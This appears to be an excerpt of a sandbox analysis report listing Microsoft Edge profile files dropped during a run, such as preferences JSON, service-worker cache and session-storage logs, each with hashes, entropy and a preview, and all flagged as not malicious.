                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379538500400205","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.55847994360738
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQzzCVWwL7pLGLht4W5wSgf4ql8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPsEIVq7pf:YQ2VDdcht4WaSgfzlu1jalbIa3t6R
                                                                                                                                                                                                                                                                                                        MD5:4A013F77E04FA27E6BD639C5A84DCA4E
                                                                                                                                                                                                                                                                                                        SHA1:EB6F940E41571A0B8A1884B1DC827FEDD830A807
                                                                                                                                                                                                                                                                                                        SHA-256:404623AA8E423F8042FA847E56264AE217BB7C7A4A5AD757799EE51809C2D19D
                                                                                                                                                                                                                                                                                                        SHA-512:76EE460D7AFE2B7917BCA66987300F487BCC620B348E1A88B3B22CE6FE3E93318C1843E30CFAE300E220DE236F720B3853C0168C9C6257ADCFF36D5AEC9D9DBD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4e78d.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.55847994360738
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQzzCVWwL7pLGLht4W5wSgf4ql8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPsEIVq7pf:YQ2VDdcht4WaSgfzlu1jalbIa3t6R
                                                                                                                                                                                                                                                                                                        MD5:4A013F77E04FA27E6BD639C5A84DCA4E
                                                                                                                                                                                                                                                                                                        SHA1:EB6F940E41571A0B8A1884B1DC827FEDD830A807
                                                                                                                                                                                                                                                                                                        SHA-256:404623AA8E423F8042FA847E56264AE217BB7C7A4A5AD757799EE51809C2D19D
                                                                                                                                                                                                                                                                                                        SHA-512:76EE460D7AFE2B7917BCA66987300F487BCC620B348E1A88B3B22CE6FE3E93318C1843E30CFAE300E220DE236F720B3853C0168C9C6257ADCFF36D5AEC9D9DBD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):80
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                        MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                        SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                        SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                        SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):303
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.145374201803489
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NV01N723oH+TcwtE/a252KLlbVNyq2PN723oH+TcwtE/a2ZIFUv:IaYeb8xL0vVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                        MD5:781A59B23EF846E94B1D537EA7A26F83
                                                                                                                                                                                                                                                                                                        SHA1:E2D6D2DD400FECD2DD70CE4CD2B71F623A8471D0
                                                                                                                                                                                                                                                                                                        SHA-256:CC3EE059BCF185AB2082605062D1C90E185D6C2C5D4732E84E210961E2ECED78
                                                                                                                                                                                                                                                                                                        SHA-512:3484F45E7A5A93C5571FA4ECA18EEA84F7FB09C158CDCF65DD3C6E604DD76205CFC114D827689E16539FACD1F228D8641FDD961F7FEE4AD06CF0EA03C11BE98B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:35.247 1bc0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/24-13:28:35.275 1bc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):114579
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.580500875085219
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekUZuOf:J9LyxPXfOxr1lMe1nL/5L/TXE6n7d6
                                                                                                                                                                                                                                                                                                        MD5:61116C36128E2536C658497483C9C4F0
                                                                                                                                                                                                                                                                                                        SHA1:AD4E6CFD528511E559BB30825CBB44CA69398D10
                                                                                                                                                                                                                                                                                                        SHA-256:4AA3495C461E85E2EFF087080B5BDF26293AC0E086C52C3E69A878B1EC84EA20
                                                                                                                                                                                                                                                                                                        SHA-512:C32ECE3CF7755DE56186FE6180EFB59A511499EDBF6D21F4FA9D496A9F42DC73BF391AA1CF7153A25BB79064C9783DB5DB7B3643C9C1DCCC1713E0495C801A78
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):189113
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.3872538931872525
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:+OEvMsWmOJX2wcN1Jim4LL/wFToXLsvE7wRyvfzrtU0FLR:MI2wc5iZL/0yj7Y8LR
                                                                                                                                                                                                                                                                                                        MD5:14FC53C6D7E3FAFA2FB52A9BF8036277
                                                                                                                                                                                                                                                                                                        SHA1:1F265B5BE417464752E3940E516080A6F1C46CDD
                                                                                                                                                                                                                                                                                                        SHA-256:E5E90C163F9EACB85D5D153EF86F4DCFBA514AF2C01BB9056F9B631271C9679D
                                                                                                                                                                                                                                                                                                        SHA-512:BD8C11159726B7568BA866AE485D486AA9C3101EE2F345B6C8DE9AB8D72DDB2C8805781586BAB85079FB25ABB6D39E080AC8D5EF556B14993519D47510DC623C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:0\r..m..........rSG.....0...../...............R.......yT`........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc.A.N....module....Rc>..l....define....RbJm/.....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...F...{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:nrC0Xl/lYV/lxEstllQPRon:rNYWs+in
                                                                                                                                                                                                                                                                                                        MD5:4A0C8B394D56A29162764E3810C19E04
                                                                                                                                                                                                                                                                                                        SHA1:EDACC5FFCEC723A009382C991526EB51BB5AE248
                                                                                                                                                                                                                                                                                                        SHA-256:37B8A982A761350EBB5754C77802F0D3F3FED07839EDFB3890675F035C00C9BE
                                                                                                                                                                                                                                                                                                        SHA-512:0DEF5668A87179C0ACC22314FD22BBE02DB4BF897AB0B373A5F20BA217B2042C47D0469E42116BB3CE9A08B0A9C8ECE369F75577C35D4A86DF982C85EB542907
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:@......oy retne.........................X....,.................4..../.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:nrC0Xl/lYV/lxEstllQPRon:rNYWs+in
                                                                                                                                                                                                                                                                                                        MD5:4A0C8B394D56A29162764E3810C19E04
                                                                                                                                                                                                                                                                                                        SHA1:EDACC5FFCEC723A009382C991526EB51BB5AE248
                                                                                                                                                                                                                                                                                                        SHA-256:37B8A982A761350EBB5754C77802F0D3F3FED07839EDFB3890675F035C00C9BE
                                                                                                                                                                                                                                                                                                        SHA-512:0DEF5668A87179C0ACC22314FD22BBE02DB4BF897AB0B373A5F20BA217B2042C47D0469E42116BB3CE9A08B0A9C8ECE369F75577C35D4A86DF982C85EB542907
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:@......oy retne.........................X....,.................4..../.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF5190d.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5931902015385067
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:nrC0Xl/lYV/lxEstllQPRon:rNYWs+in
                                                                                                                                                                                                                                                                                                        MD5:4A0C8B394D56A29162764E3810C19E04
                                                                                                                                                                                                                                                                                                        SHA1:EDACC5FFCEC723A009382C991526EB51BB5AE248
                                                                                                                                                                                                                                                                                                        SHA-256:37B8A982A761350EBB5754C77802F0D3F3FED07839EDFB3890675F035C00C9BE
                                                                                                                                                                                                                                                                                                        SHA-512:0DEF5668A87179C0ACC22314FD22BBE02DB4BF897AB0B373A5F20BA217B2042C47D0469E42116BB3CE9A08B0A9C8ECE369F75577C35D4A86DF982C85EB542907
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:@......oy retne.........................X....,.................4..../.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):7739
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.3604397884011825
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:Dhmiq5DClQLEs9Xp+smApKi6DjLl9iSr/TU6dqE32:Dhmiq5Dd9Xp+smTZLl9iSrLd8E32
                                                                                                                                                                                                                                                                                                        MD5:52168C8B93D11BAD3224497BA4C2D2E9
                                                                                                                                                                                                                                                                                                        SHA1:56D6B4F52BDB7223550B9AC79991FEB7B4613664
                                                                                                                                                                                                                                                                                                        SHA-256:E2C00118A6879AEA7D475BD8D347C4A223FFD73C5D8925407DAE7A60C700E2A4
                                                                                                                                                                                                                                                                                                        SHA-512:04D04617F9F7B1D0793C0E1EF19947EFD2EAF042DA4E0F76FC2DF0995C6C4B76EE16F74A5AC397E9ECD113C24B354BDCC7481B22AFA728CEEC410B808FDFAB4B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............R...b................next-map-id.1.Cnamespace-f7d63829_6d7f_4ea3_9f72_e393d960e41b-https://ntp.msn.com/.0_...................map-0-shd_sweeper.9{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.p.r.g.-.e.s.h.b.t.n.t.r.t.f.a.c.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.-.c.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.c.p.r.g.-.c.-.p.o.l.i.s.h.-.s.t.y.l.e.s.,.1.s.-.p.n.p.s.n.i.c.e.r.t.,.p.r.g.-.1.s.w.-.s.a.b.g.t.a.s.k.t.h.r.o.t.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.5.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.i.2.c.,.p.r.g.-.1.s.w.-.s.a.l.3.r.m.f.e.a.t.s.t.,.p.r.g.-.1.s.w.-.n.o.a.b.r.t.-.r.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.097177695266015
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NeE24q2PN723oH+TcwtrQMxIFUt8Ee7gZmw+Et3DkwON723oH+TcwtrQMFLJ:8EVvVaYebCFUt8P0/+kz5OaYebtJ
                                                                                                                                                                                                                                                                                                        MD5:A6E49EFB4D1E343FBF1C40403B3F1F9B
                                                                                                                                                                                                                                                                                                        SHA1:6EAE58248BD5B1EA0DAFAD0C05EA2CF23C006901
                                                                                                                                                                                                                                                                                                        SHA-256:45BB30D91B852D11DC36D9482D07D294DE2164307311300606CB873EE7543461
                                                                                                                                                                                                                                                                                                        SHA-512:DE2A7F9C16093F3BF0CF132DF0035762802ABDBB53D0D7424B6A9C8CD8FCD8F28FC99D097CB337E44384A573B248E53BCB1C6E8B0251BB5664B4BCB953B1A244
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.413 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/24-13:28:20.414 b90 Recovering log #3.2024/12/24-13:28:20.421 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.097177695266015
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NeE24q2PN723oH+TcwtrQMxIFUt8Ee7gZmw+Et3DkwON723oH+TcwtrQMFLJ:8EVvVaYebCFUt8P0/+kz5OaYebtJ
                                                                                                                                                                                                                                                                                                        MD5:A6E49EFB4D1E343FBF1C40403B3F1F9B
                                                                                                                                                                                                                                                                                                        SHA1:6EAE58248BD5B1EA0DAFAD0C05EA2CF23C006901
                                                                                                                                                                                                                                                                                                        SHA-256:45BB30D91B852D11DC36D9482D07D294DE2164307311300606CB873EE7543461
                                                                                                                                                                                                                                                                                                        SHA-512:DE2A7F9C16093F3BF0CF132DF0035762802ABDBB53D0D7424B6A9C8CD8FCD8F28FC99D097CB337E44384A573B248E53BCB1C6E8B0251BB5664B4BCB953B1A244
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.413 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/24-13:28:20.414 b90 Recovering log #3.2024/12/24-13:28:20.421 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

